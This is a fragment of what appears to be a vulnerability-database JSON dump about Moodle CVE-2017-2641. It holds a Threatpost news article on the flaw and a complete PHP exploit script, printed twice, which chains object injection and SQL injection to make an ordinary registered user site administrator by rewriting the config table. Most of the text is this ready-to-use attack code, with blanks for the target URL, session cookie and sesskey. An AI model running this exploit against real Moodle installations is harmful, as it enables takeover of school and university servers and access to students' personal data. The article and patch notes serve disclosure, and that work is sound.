Exploit: Moodle SQL Injection via Object Injection Through User Preferences\n# Date: April 6th, 2017\n# Exploit Author: Marko Belzetski\n# Contact: mbelzetski@protonmail.com\n# Vendor Homepage: https://moodle.org/\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\n# CVE : CVE-2017-2641\n\n1. Description\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\n\n2. PoC\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\n\n<?php\n\n//defining the required classes for our exploit\nnamespace gradereport_singleview\\local\\ui {\n class feedback{ \n }\n}\n\nnamespace {\n class gradereport_overview_external{\n}\n\nclass grade_item{\n}\n\nclass grade_grade{\n}\n\n\n// creating a simple httpPost method which requires php-curl\nfunction httpPost($url, $data, $MoodleSession, $json)\n{\n $curl = curl_init($url);\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\n if($json){\n array_push($headers, 'Content-Type: application/json');\n }else{\n $data = urldecode(http_build_query($data));\n }\n curl_setopt($curl, CURLOPT_POST, true);\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\n $response = curl_exec($curl);\n curl_close($curl);\n return $response;\n}\n\n// creating a simple httpGet method which requires php-curl\nfunction httpGet($url, $MoodleSession)\n{\n $curl = curl_init($url);\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\n $response = curl_exec($curl);\n curl_close($curl);\n return $response;\n}\n\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\n $base = new gradereport_overview_external();\n\n // now we create the feedback object which inherits the vulnerable __tostring() method from its parent\n $fb = new gradereport_singleview\\local\\ui\\feedback();\n\n //filling the feedback object with the required properties for the exploit to work\n $fb -> grade = new grade_grade();\n $fb -> grade -> grade_item = new grade_item();\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\n $fb -> grade -> grade_item -> calculation_normalized = false;\n\n //setting the table which we want to alter\n $fb -> grade -> grade_item -> table = $table;\n //setting the row id of the row that we want to alter\n $fb -> grade -> grade_item -> id = $rowId;\n //setting the column with the value that we want to insert\n $fb -> grade -> grade_item -> $column = $value;\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\n \n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\n $arr = array(array($base),$fb);\n \n //serializing the array\n $value = serialize($arr);\n\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\n httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\n\n //injecting the payload\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\n\n //getting the frontpage so the payload will activate\n httpGet($url.'/my/', $MoodleSession);\n }\n\n$url = ''; //url of the Moodle site\n$MoodleSession = '' //your MoodleSession cookie value\n$sesskey = ''; //your sesskey\n\n$table = \"config\"; //table to update \n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation\n$column = 'value'; //column name to update, which holds the userid\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\n\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\n\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\n$rowId = 375 // row id of 'allversionshash' parameter\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\n\n//reset the sortorder so we can see the front page again without the payload triggering\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\n\n//force plugincheck so we can access admin panel\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\n\n}\n?>\n\n\n3. Solution:\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:56", "bulletinFamily": "info", "cvelist": ["CVE-2017-2641"], "description": "A critical vulnerability in Moodle, an open source PHP-based learning management system deployed across scores of schools and universities, could expose the server its running on to compromise.\n\n[Tens of thousands of universities](<https://moodle.net/sites/index.php?country=US>) worldwide, including the California State University system, the University of Oxford, and Stanford University, use the service to provide students with course outlines, grades, and other personal data.\n\nThe issue\u2013at its root a SQL injection vulnerability\u2013could be used by an attacker to execute PHP code on a university\u2019s server according to Netanel Rubin, the researcher who found the bug.\n\nRubin, who has previously dug up vulnerabilities in [Mozilla\u2019s Bugzilla](<https://threatpost.com/details-surface-on-patched-bugzilla-privilege-escalation-flaw/114713/>) bug tracking system, e-commerce platform [Magento](<https://threatpost.com/remote-code-execution-hole-patched-in-magento-ecommerce-platform/112334/>), and [WordPress](<https://threatpost.com/wordpress-patches-serious-shortcodes-core-engine-vulnerability/114673/>), described the bug in depth [in a blog post](<http://netanelrub.in/2017/03/20/moodle-remote-code-execution/>) on Monday.\n\n> Ever wanted to hack a university? Well, now you probably can, with my new [#Moodle](<https://twitter.com/hashtag/Moodle?src=hash>) 0-day!<https://t.co/JUBo4LuU2C>\n> \n> \u2014 Netanel Rubin (@na7irub) [March 20, 2017](<https://twitter.com/na7irub/status/843797184172777472>)\n\nMoodle published details around the bug, including its CVE (CVE-2017-2641) [on Monday as well](<https://moodle.org/mod/forum/discuss.php?d=349419>), warning that an ordinary registered user could exploit the vulnerability via web interface.\n\n\u201cSimilar scenarios could be used in previous versions of Moodle but only by managers/admins and only via web services,\u201d the advisory reads.\n\nSchool IT administrators are being encouraged to apply a patch that maintainers of the system pushed 10 days ago. An update from early last week, [3.3.2](<https://docs.moodle.org/dev/Moodle_3.2.2_release_notes#Highlights>), also includes the fix.\n\n> [#Moodle](<https://twitter.com/hashtag/Moodle?src=hash>) 3.2.2, 3.1.5, 3.0.9 and 2.7.19 are now available! \nFind out more: <https://t.co/9jcS3qcJ83> \nOr to download: <https://t.co/i00mq1zwY8> [pic.twitter.com/zhTKKQhYSV](<https://t.co/zhTKKQhYSV>)\n> \n> \u2014 Moodle (@moodle) [March 13, 2017](<https://twitter.com/moodle/status/841287925702766593>)\n\nUntil patched, Rubin warns the vulnerability will continue to affect \u201calmost all Moodle versions,\u201d including 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.\n\nAccording to Rubin the vulnerability stems from a handful of small, logical vulnerabilities.\n\nMoodle is a project with lots of code\u2013two million lines, according to Rubin. Because of that and the fact that many developers oversee it, the system was designed with the assumption that one feature, user preferences, couldn\u2019t be taken advantage of.\n\nRubin discovered that he could exploit the feature however and get an unserialize call by leaving a preference in a block mechanism empty. That could open the door to an object injection attack.\n\nWhile the attack had its limitations, Rubin discovered a way to pivot from it to a series of method calls. From there, he found he could use the system\u2019s \u201cupdate\u201d method to update any row in an affected database. This gave him the ability to tweak administrator accounts, passwords, the site configuration, \u201cbasically whatever we want,\u201d he wrote.\n\nRubin used a double SQL injection to top off his exploit, helping him gain full administrator privileges on any server running Moodle.\n\n\u201cAfter gaining full administrator privileges executing code is as simple as uploading a new plugin or template to the server,\u201d Rubin writes.\n", "modified": "2017-03-21T18:48:57", "published": "2017-03-21T14:48:57", "id": "THREATPOST:EEAB5FD7E056F4A8CAFD6A3AAF9CE7C0", "href": "https://threatpost.com/critical-moodle-vulnerability-could-lead-to-server-compromise/124446/", "type": "threatpost", "title": "Critical Moodle Vulnerability Could Lead to Server Compromise", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-02-18T21:24:45", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-04-07T00:00:00", "type": "zdt", "title": "Moodle 2.x/3.x - SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2641"], "modified": "2017-04-07T00:00:00", "href": "https://0day.today/exploit/description/27534", "id": "1337DAY-ID-27534", "sourceData": "# Exploit: Moodle SQL Injection via Object Injection Through User Preferences\r\n# Date: April 6th, 2017\r\n# Exploit Author: Marko Belzetski\r\n# Contact: [email\u00a0protected]\r\n# Vendor Homepage: https://moodle.org/\r\n# Version: 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions\r\n# Tested on: Moodle 3.2 running on php7.0 on Ubuntu 16.04\r\n# CVE : CVE-2017-2641\r\n \r\n1. Description\r\nIn Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions, any registered user can update any table of the Moodle database via an objection injection through a legacy user preferences setting (Described by Netanel Rubin at http://netanelrub.in/2017/03/20/moodle-remote-code-execution/)\r\n \r\n2. PoC\r\nLog in as a regular user and note the URL of the Moodle site, the 'MoodleSession' cookie value and the 'sesskey' parameter along with your 'userid' from the page source. Paste these values into the exploit script, fire the script, re-authenticate and you will be the site administrator.\r\n \r\n<?php\r\n \r\n//defining the required classes for our exploit\r\nnamespace gradereport_singleview\\local\\ui {\r\n class feedback{ \r\n }\r\n}\r\n \r\nnamespace {\r\n class gradereport_overview_external{\r\n}\r\n \r\nclass grade_item{\r\n}\r\n \r\nclass grade_grade{\r\n}\r\n \r\n \r\n// creating a simple httpPost method which requires php-curl\r\nfunction httpPost($url, $data, $MoodleSession, $json)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n if($json){\r\n array_push($headers, 'Content-Type: application/json');\r\n }else{\r\n $data = urldecode(http_build_query($data));\r\n }\r\n curl_setopt($curl, CURLOPT_POST, true);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_POSTFIELDS, $data);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n \r\n// creating a simple httpGet method which requires php-curl\r\nfunction httpGet($url, $MoodleSession)\r\n{\r\n $curl = curl_init($url);\r\n $headers = array('Cookie: MoodleSession='.$MoodleSession);\r\n curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);\r\n // curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy\r\n $response = curl_exec($curl);\r\n curl_close($curl);\r\n return $response;\r\n}\r\n \r\nfunction update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){\r\n //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need\r\n $base = new gradereport_overview_external();\r\n \r\n // now we create the feedback object which inherits the vulnerable __tostring() method from its parent\r\n $fb = new gradereport_singleview\\local\\ui\\feedback();\r\n \r\n //filling the feedback object with the required properties for the exploit to work\r\n $fb -> grade = new grade_grade();\r\n $fb -> grade -> grade_item = new grade_item();\r\n $fb -> grade -> grade_item -> calculation = \"[[somestring\";\r\n $fb -> grade -> grade_item -> calculation_normalized = false;\r\n \r\n //setting the table which we want to alter\r\n $fb -> grade -> grade_item -> table = $table;\r\n //setting the row id of the row that we want to alter\r\n $fb -> grade -> grade_item -> id = $rowId;\r\n //setting the column with the value that we want to insert\r\n $fb -> grade -> grade_item -> $column = $value;\r\n $fb -> grade -> grade_item -> required_fields = array($column,'id');\r\n \r\n //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object\r\n $arr = array(array($base),$fb);\r\n \r\n //serializing the array\r\n $value = serialize($arr);\r\n \r\n //we'll set the course_blocks sortorder to 0 so we default to legacy user preference\r\n $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);\r\n httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n \r\n //injecting the payload\r\n $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value))))));\r\n httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);\r\n \r\n //getting the frontpage so the payload will activate\r\n httpGet($url.'/my/', $MoodleSession);\r\n }\r\n \r\n$url = ''; //url of the Moodle site\r\n$MoodleSession = '' //your MoodleSession cookie value\r\n$sesskey = ''; //your sesskey\r\n \r\n$table = \"config\"; //table to update \r\n$rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation\r\n$column = 'value'; //column name to update, which holds the userid\r\n$value = 3; // userid to set as 'siteadmins' Probably want to make it your own\r\n \r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);\r\n \r\n//reset the allversionshash config entry with a sha1 hash so the site reloads its configuration\r\n$rowId = 375 // row id of 'allversionshash' parameter\r\nupdate_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));\r\n \r\n//reset the sortorder so we can see the front page again without the payload triggering\r\n$data = array('sesskey' => $sesskey, 'sortorder[]' => 1);\r\nhttpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);\r\n \r\n//force plugincheck so we can access admin panel\r\nhttpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);\r\n \r\n}\r\n?>\r\n \r\n \r\n3. Solution:\r\nUpgrade to fixed Moodle versions: 3.2.2, 3.1.5, 3.0.9 or 2.7.19\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/27534", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
